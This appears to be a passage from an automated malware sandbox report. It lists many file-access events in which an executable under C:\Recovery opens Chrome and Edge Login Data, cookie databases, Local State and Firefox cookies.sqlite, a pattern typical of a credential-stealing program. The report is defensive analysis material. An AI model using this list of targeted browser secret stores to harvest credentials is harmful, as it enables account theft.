                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
